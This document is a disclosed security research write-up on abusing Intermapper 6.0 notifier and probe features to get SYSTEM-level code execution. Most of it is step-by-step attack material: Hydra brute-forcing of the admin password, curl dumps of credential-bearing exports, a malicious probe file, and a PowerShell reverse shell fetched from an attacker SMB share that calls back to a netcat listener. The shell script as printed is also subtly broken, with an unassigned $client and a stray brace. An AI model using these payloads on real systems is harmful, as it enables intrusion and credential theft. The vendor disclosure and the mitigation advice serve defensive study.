# Exploiting application functionality - Help Systems Intermapper

## Introduction

The vectors demonstrated below are not necessarily exploits or security vulnerabilities. They exists within applications such as Intermapper to provide a certain functionality to the end-user. However, as demonstrated, it is trivial to perform remote code execution and achieve local escalated user privileges through a small number of steps. If performed on the Intermapper server itself, executed as a low-level user, these techniques can also be used to perform privilege escalation.

The reverse shell obtained is only valid for the server used to host the Intermapper server process. Specific credentials can already be acquired through bruteforce cracking of the password hashes visible through the SMB/CIFS query for the PowerShell script.

The vectors below will only work with an application user with administrator privileges (application, not system!). First step is to obtain these credentials (if you do not already have them) by bruteforcing the administrator password.

The exploitation steps all achieve the same goal and all take a similar route to download the payload. Variations will also work but that is not the point of this write-up. The information extracted through the API is less critical for the documented vectors but do demonstrate the significance of properly enumerating. For example, the notification configuration may contain system credentials.

An industry-compliant responsible disclosure was performed with the vendor mid-2019, prior to publication. The research below was performed on Intermapper version 6.0 early 2019. No further research or confirmation was done on current versions. 

Help Systems has already put specific countermeasures in place (such as sanitizing information before sending over unencrypted protocols or limiting the API for specific data sets only, in order to prevent an easy exploitation of probe or notification vectors using non-GUI entry points) in order to minimize breaches. Unfortunately, documented vectors below are part of the feature-set and are difficult to mitigate.

## Bruteforcing the Admin password

Access to the web GUI requires a valid set of credentials. By default, the admin user has been configured. Bruteforce the admin user password using Hydra:

```
# hydra -l admin -P rockyou.txt -t 10 -f -vV 10.0.0.1 http-get '/~admin'
```

![bruteforcing admin password with Hydra](im_hydra1.png)

![bruteforcing admin password with Hydra](im_hydra2.png)


## Extracting Device Information (API)

Intermapper provides access to the device information through the GUI and through the API. Device information will also contain any information related to probe configuration, for instance SNMP community strings. Not all information extracted may be useful during an assessment. 

As documented in the Developer Guide, use wget or curl to dump the device information:

```
# curl --user admin:PASSWORD https://10.0.0.1:8181/~export/devices.csv -o devices.csv -k
```

Sensitive information (passwords, usernames, community strings) is sanitized when performing the request over non-encrypted (non-SSL) connections!

### Extracting User Information (API)

Intermapper provides access to the user information through the GUI and through the API. Not all information extracted may be useful during an assessment. 

As documented in the Developer Guide, use wget or curl to dump the user information:

``` 
# curl --user admin:PASSWORD https://10.0.0.1:8181/~export/users.csv -o users.csv -k
```

Sensitive information (passwords, usernames, community strings) is sanitized when performing the request over non-encrypted (non-SSL) connections!

### Extracting Probes (API)
Intermapper provides access to the probe information through the GUI. Not all information extracted may be useful during an assessment.

As documented in the Developer Guide, use wget or curl to dump the probe information:

``` 
# curl --user admin:PASSWORD https://10.0.0.1/~files/probes -o probes.txt -k
```

Sensitive information (passwords, usernames, community strings) is sanitized when performing the request over non-encrypted (non-SSL) connections! 

There is no way to create a notifier through the API. Exploiting this functionality will need to be done through the GUI.

### Exploiting Notifiers (GUI)

In the RemoteAccess client, create new device entry for your Kali machine. Set probe type to SNMP.

Create a new Device Notifier by right-clicking on the device and selecting Device Notifiers.

![Setting up notifiers](im_notifier1.png)

Click on Edit Notifiers and click on the + icon in the Server Settings.

Once created. Tick all tickboxes (Down, Up, Critical, Alarm, Warn, OK) to run the notification command on any event.

Create a new Notifier. Set Type to PowerShell. Set PowerShell arguments to ```-ExecutionPolicy ByPass -NoProfile``` 

Set PowerShell command text to ```\\10.0.0.1\e\nc.ps1```

![Setting up notifiers](im_notifier2.png)

Set up SNMP on your Kali machine and allow external hosts to poll SNMP information. Set community string to public.

![Add new device and set up SNMP](im_notifier3.png)

Create a file on your local Kali machine: ```nc.ps1```

```
New-Object System.Net.Sockets.TCPClient("10.0.0.1",4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{ $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,
$i);
  $sendback = (iex $data 2>&1 | Out-String );
  $sendback2 =
  $sendback + "PS " + (pwd).Path + "> ";
  $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
  $stream.Write($sendbyte,0,$sendbyte.Length);
  $stream.Flush()};$client.Close()
}
````

Start an SMB server process on your Kali and host the nc.ps1 file:

``` 
# python /usr/share/doc/python-impacket/examples/smbserver.py e /root/ 
```

![Setting up Samba share](im_notifier4.png)

Start Netcat listener on your Kali

```
# nc -lvp 4444
```

![Setting up netcat listener](im_notifier5.png)

Trigger a Notification by stopping SNMP server process on Kali

```
# /etc/init.d/snmpd stop
```

This will trigger a Notification in your Intermapper and execute the defined command.

![Trigger notification](im_notifier6.png)

The reverse shell Powershell script is now mounted from SMB server and executed on the Intermapper server.

![Got shell!](im_notifier7.png)

![Got shell!](im_notifier8.png)

This will result in a reverse shell onto the Intermapper server with System level privileges. This can be mitigated by running the server process as a less privileged user (permissions permitting).

### Exploiting Probes (GUI)

Probes are an inherent part of the Intermapper feature set. They allow a specific component (customized or built-in) to be used to monitor availability or performance information of network or system elements. The exposure of system-level access is achieved by loading a customized Powershell probe.

Create a new file called ```powershell.revshell.txt```:

```
<!--
Intermapper Powershell based Reverse Shell Proof of Concept probe 
It demonstrates how an application function can be exploited to obtain system level access onto an application server, simply by obtaining elevated application-level user privileges. 

Exploitation is achieved by downloading the Powershell code from a remote SMB/CIFS network share. Reverse Shell code can also be placed in the command line arguments in this case. 
Payload hosting is handled in exactly the same approach as a different demonstrated vector, based on Notifications. 

To trigger execution, set the Probe Type to PowerShell > Remoting > Reverse Shell and click OK. Reprobe selection if needed. 

Hendrik Van Belleghem
https://gitlab.com/hendrikvb/intermapper-payload/

-->

<header>
    type = "cmd-line"
    package = "revshell"
    probe_name = "revshell"
    human_name = "Powershell Reverse Shell"
    version = "1.0"
    address_type = "IP"
    display_name = "PowerShell/Remoting/Reverse Shell"
    visible_in = "Windows"
</header>

<description>
        \GB\PowerShell based Reverse Shell Proof of Concept\p\

This probe uses PowerShell to start a reverse shell to an attacker machine. It demonstrates how an application function can be exploited to obtain system level access onto an application server, simply by obtaining elevated application-level user privileges.

Exploitation is achieved by downloading the Powershell code from a remote SMB/CIFS network share. Reverse Shell code can also be placed in the command
line arguments in this case. Payload hosting is handled in exactly the same approach as a different demonstrated vector, based on Notifications.

To trigger execution, set the Probe Type to PowerShell > Remoting > Reverse Shell and click OK. Reprobe selection if needed.

Hendrik Van Belleghem
https://gitlab.com/hendrikvb/intermapper-payload/
</description>

<command-exit>
    down:${EXIT_CODE}=4
    critical:${EXIT_CODE}=3
    alarm:${EXIT_CODE}=2
    warning:${EXIT_CODE}=1
    okay:${EXIT_CODE}=0
</command-exit>

<command-line>
    path="C:\Windows\system32\WindowsPowerShell\v1.0"
    cmd="powershell.exe"
    arg="-ExecutionPolicy ByPass -NoProfile -Command \\10.0.0.1\e\nc.ps1"
    input = ""
    timeout = 9999999
</command-line>

<command-display>
</command-display>
```

In the RemoteAccess client, use the ```File > Import > Probe``` menu, load the Probe file.

![Load probe](im_probe1.png)

Create a file (if it doesn't yet exist from the previous vector) on your local Kali machine: ```nc.ps1```

```
New-Object System.Net.Sockets.TCPClient("10.0.0.1",4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{ $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,
$i);
  $sendback = (iex $data 2>&1 | Out-String );
  $sendback2 =
  $sendback + "PS " + (pwd).Path + "> ";
  $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
  $stream.Write($sendbyte,0,$sendbyte.Length);
  $stream.Flush()};$client.Close()
}
```

Start an SMB server process on your Kali and host the nc.ps1 file:

``` 
# python /usr/share/doc/python-impacket/examples/smbserver.py e /root/ 
```

![Setting up Samba share](im_probe2.png)

Start Netcat listener on your Kali

```
# nc -lvp 4444
```

![Setting up netcat listener](im_probe3.png)

Use the existing Kali device earlier, set the Probe Type to ```PowerShell > Remoting > Reverse Shell```.

![Setting up device probe type](im_probe4.png)

Reprobe the device if needed or wait until the defined polling interval triggers the probe update.

![Got shell!](im_probe5.png)

![Got shell!](im_probe6.png)

This will result in a reverse shell onto the Intermapper server with System level privileges. This can be mitigated by running the server process as a less privileged user (permissions permitting).

### Mitigation

As listed above, mitigating these weaknesses is difficult without limiting the functionality of the application. Some steps can be taken to secure your Intermapper configuration:
- Define strong password for admin user
- Block access for API and RemoteAccess through firewall policies
- Define GPOs to prevent SMB/CIFS mounting of PowerShell scripts and enforce signatures
- Run the Intermapper server process on a less-privileged user. Although this may still allow remote code execution, it adds another hurdle in search of system privileges.

## Authors and acknowledgment

Hendrik Van Belleghem - hendrikvb

[The Intermapper product is now owned by Fortra.](https://www.fortra.com/products/network-monitoring-software/network-mapping-software)

## Project status
This page has the initial research summary as provided by the vendor mid 2019. Additional feedback or updates can be added at a later date.

### Disclaimer
No animals or sensitive network components were hurt during the discovery and development of these vectors.
